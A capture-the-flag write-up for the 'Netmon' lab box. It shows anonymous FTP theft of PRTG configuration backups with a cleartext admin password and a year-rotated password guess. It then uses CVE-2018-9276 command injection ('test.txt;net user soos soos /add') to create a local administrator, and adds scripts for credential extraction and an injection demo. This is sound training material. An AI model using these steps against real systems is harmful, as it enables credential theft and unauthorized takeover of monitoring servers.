Netmon

Personal Rating: Easy

Enumeration

The initial nmap scan shows a typical Windows host (RPC, SMB, WinRM) plus an FTP server and a PRTG web interface; there is no Kerberos or LDAP, so this is not a domain controller:

sudo nmap -p- -sV <IP>

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC

On port 80, http://<TARGETIP>/index.htm is the login form of PRTG Network Monitor (the service name is printed on the page, and nmap already reported the exact build, 18.1.37.13946). Researching that version turned up a known weakness that applies to the running build:

https://www.reddit.com/r/sysadmin/comments/835dai/prtg_exposes_domain_accounts_and_passwords_in/

The post explains that PRTG writes its configuration, including account passwords, to files under ProgramData, and that the .old.bak copy keeps them in cleartext. Since the FTP server on port 21 accepts anonymous logins and exposes the system drive, those files can simply be downloaded:

ftp 10.10.10.152
Name: anonymous
Password: (anything)

ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
ftp> ls
ftp> binary
ftp> get "PRTG Configuration.dat"
ftp> get "PRTG Configuration.old.bak"

The old backup (PRTG Configuration.old.bak) contains the user prtgadmin with the cleartext password PrTg@dmin2018.

The file is huge, but searching for "password" in kate finds the dbpassword entry quickly.

The current PRTG Configuration.dat was last modified in 2019, so on the guess that the administrator rotates the year, I tried PrTg@dmin2019, which worked on the login form.
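The credential hunt above, as an added example that is not part of the original writeup: the script below pulls cleartext passwords out of a PRTG configuration file and derives the same year-rotated guess, using a constructed sample config. The sample mimics the <dbpassword> layout of the .old.bak (cleartext value) and the .dat (value flagged <encrypted/>); that layout, and the element names, are assumptions taken from the downloaded files rather than anything documented on this page.

```shell
#!/bin/sh
# Added example, not part of the original writeup: extract cleartext
# credentials from a PRTG configuration backup and build a year-rotated
# guess. The sample config below is constructed; the <dbpassword> /
# <encrypted/> layout it mimics is an assumption about the real files.

# Print "user password" for every cleartext <dbpassword> element in a file.
prtg_passwords() {
    awk '
        /<dbpassword>/           { inpw = 1; enc = 0; user = ""; pw = ""; next }
        inpw && /<encrypted\/>/  { enc = 1 }
        inpw && /<!-- User:/     { user = $3 }      # "<!-- User: prtgadmin -->"
        inpw && /<\/dbpassword>/ {
            if (!enc && pw != "") print user, pw
            inpw = 0; next
        }
        inpw {
            line = $0
            gsub(/^[ \t]+|[ \t]+$/, "", line)
            if (line != "" && line !~ /^</) pw = line   # bare text node = password
        }
    ' "$1"
}

# Replace a trailing four-digit year in a password with another year, e.g. the
# modification year of the newer config file (read it with ls -l or stat).
year_rotate() {
    printf '%s\n' "$1" | sed -E "s/[0-9]{4}\$/$2/"
}

# Constructed sample standing in for the downloaded backup.
write_sample_config() {
    cat >"$1" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<data>
  <user>
    <login>prtgadmin</login>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
  </user>
  <user>
    <login>svc_monitor</login>
    <dbpassword>
      <flags>
        <encrypted/>
      </flags>
      JO3ZxQ7n.constructed.ciphertext
    </dbpassword>
  </user>
</data>
EOF
}

sample=$(mktemp)
write_sample_config "$sample"
prtg_passwords "$sample"                                 # prtgadmin PrTg@dmin2018
prtg_passwords "$sample" | while read -r user pw; do
    echo "$user $(year_rotate "$pw" 2019)"               # prtgadmin PrTg@dmin2019
done
rm -f "$sample"
```

Run it against the real "PRTG Configuration.old.bak" by calling prtg_passwords on that path; entries flagged <encrypted/> are skipped on purpose, because only the cleartext ones from the old backup are directly usable.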

I tried the Metasploit module exploit/windows/http/prtg_authenticated_rce with these credentials, but it didn't work.

PRTG Command Injection

Authenticated PRTG users can get OS command execution through notifications (CVE-2018-9276, fixed in PRTG 18.2.39, so the 18.1.37 build here is affected): under Setup > Account Settings > Notifications, add a notification with the "Execute Program" action and select one of the bundled demo scripts. The Parameter field is handed to that script without sanitization, so a semicolon ends the intended argument and whatever follows runs as a separate command, with the privileges of the PRTG core service (SYSTEM). Save the notification and use its "Test" button to trigger it with a parameter such as:

test.txt;net user soos soos /add

Running net localgroup administrators soos /add the same way makes the new user a local administrator, after which I could log onto the machine with that account (for example over WinRM on port 5985 or SMB). While looking around I also found the following PEM block for the existing admin user. Note that it is labelled CERTIFICATE, so it is an X.509 certificate rather than an SSH private key:

-----BEGIN CERTIFICATE-----
MIICdjCCAd+gAwIBAgIBADANBgkqhkiG9w0BAQQFADA3MQswCQYDVQQGEwJOQTEM
<SNIP>
vgpGR4Wd9aPvgw==
-----END CERTIFICATE-----
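The injection class behind the notification parameter above, as an added example that is neither PRTG's code nor part of the original writeup: a vulnerable handler that splices the Parameter value into a command string for a shell to re-parse, next to a fixed handler that passes it as a single argument, plus a check of the nmap banner version against the 18.2.39 fix. The handlers are a model of the bug, not the real PRTG script, and the version cutoff is taken from the CVE-2018-9276 advisories.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from PRTG: a model of
# how the notification "Parameter" field reaches a shell. Assumptions: the
# vulnerable handler builds one command string and hands it to a shell; the
# fixed handler passes the value as a single argv entry; 18.2.39 is the
# fixed release per the CVE-2018-9276 advisories.

# Vulnerable: the Parameter value is spliced into a command string that a
# shell re-parses, so ";" ends the file name and starts a new command.
notify_vulnerable() {
    sh -c "printf 'notification written to %s\n' $1"
}

# Fixed: the value travels as one argument; metacharacters stay literal.
notify_fixed() {
    sh -c 'printf "notification written to %s\n" "$1"' notify "$1"
}

# Return 0 when a PRTG build (as printed by nmap -sV) predates 18.2.39.
prtg_is_vulnerable() {
    awk -v v="$1" 'BEGIN {
        split(v, a, "."); split("18.2.39", f, ".")
        for (i = 1; i <= 3; i++) {
            if (a[i] + 0 < f[i] + 0) exit 0
            if (a[i] + 0 > f[i] + 0) exit 1
        }
        exit 1
    }'
}

payload='test.txt;echo INJECTED'
echo "--- vulnerable handler ---"
notify_vulnerable "$payload"          # second line of output: INJECTED
echo "--- fixed handler ---"
notify_fixed "$payload"               # one line, the ";echo INJECTED" kept literal
if prtg_is_vulnerable 18.1.37.13946; then
    echo "18.1.37.13946 predates the 18.2.39 fix"
fi
```

Swap "echo INJECTED" for "net user soos soos /add" and the vulnerable handler is exactly what the notification test does on the box; the fixed handler shows why quoting the value at the point of use, rather than filtering characters in the form, is the correct repair.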
